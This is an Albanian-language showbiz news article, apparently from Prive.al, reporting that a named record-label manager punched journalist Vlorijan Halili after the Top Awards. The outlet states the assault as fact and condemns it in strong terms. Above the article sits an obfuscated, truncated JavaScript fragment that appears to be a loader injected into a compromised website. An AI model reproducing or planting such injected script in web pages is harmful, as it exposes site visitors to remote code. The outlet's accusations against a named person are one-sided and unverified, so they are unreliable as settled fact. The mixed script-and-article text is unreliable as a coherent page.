;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

SKANDAL: Menaxheri i On Records, degjeneron në dhunë ndaj gazetarit Vlorijan Halili

By

Një ngjarje e paprecedent, për të parën herë në historinë shtatë vjeçare të funksionimit të Prive si adresa numër një e showbizit në trojet shqipfolëse është shënuar mbrëmë pas përfundimit të Top Awards.

Gazetari Vlorijan Halili, i cili me punën e tij si asnjë gazetar tjetër shqiptar ka rënë në sy dhe është komentuar edhe prej prestigjiozes britanike Daily Mail, është sulmuar nga menaxheri i On Records, Mehmet Elshani bashkë me një person tjetër.

I verbuar sipas gjasave edhe nga debakli i përjetuar në ndarjen e çmimeve, ky mashkull rreth të 40-tave, larg prej niveleve racionale të arsyes ka degjeneruar në atë që ndoshta di të bëj më së miri – dhunën.

I shoqëruar edhe nga një tjetër person, Mehmeti ka grushtuar gazetarin Halili për raportimin në Prive.al pak minuta para nisjes së spektaklit.

Duket se Elshanit i ka djegur shumë fakti i raportimit se ‘yjet’ e tij nuk janë njohur nga gazetarja Xhemi Shehu në tapetin e kuq e cila për fat të keq nuk ia ka pasur as idenë më të vogël për emrat e reperëve.

Ky raportim, i realizuar në Prishtinë, komplet i shkëputur nga Vlorijani që gjendej në terren përkundër faktit se është transmetuar LIVE para mijëra spektatorëve në Top Channel, nuk ka mundur të kapërdihet lehtë për daljen në Prive.al nga Mehmet Elshani që në mungesë të çfarëdo lloj mjeti tjetër ka zgjedhur dhunën duke i shkaktuar lëndime trupore Vlorijanit.

Veprimi shokues ndaj gazetarit Halili është dënuar rëndë që në momentet e para edhe nga drejtori i Klan Kosova, Alaudin Hamiti dhe producentja e Prive, Liberta Spahiu.

Prive, duke besuar në drejtësi, çështjen do ta përcjell deri në fund tek autoritetet ligjore në Kosovë e Shqipëri për të mos lejuar që një mendësi e tillë anarkike të gjej aplikim të mëtejmë në gazetarinë e showbizit në veçanti dhe shoqërinë tonë në përgjithësi.

Me të gjithë të drejtën në anën tonë dhe raportimin korrekt me të cilin identifikohemi, ne nuk do ndalemi deri në epilogun e duhur të çështjes. Forca mund të jetë monopol i aparatit policor apo kompanive të sigurimit, por në fusha tjera përfshirë edhe showbizin, gjërat janë ndryshe! DHUNA DËNOHET!

image-0.02.01.6affbf5597167c10ce6d7dca9ab3fc6d93209b7503685a06bc6b36882e24d4dc-V

image-0.02.01.345b5e972028db8202ee6d4ce2e52c2323d462ad6b1f2b2aadfd7ba119770e7f-V

Artikuj të ngjashëm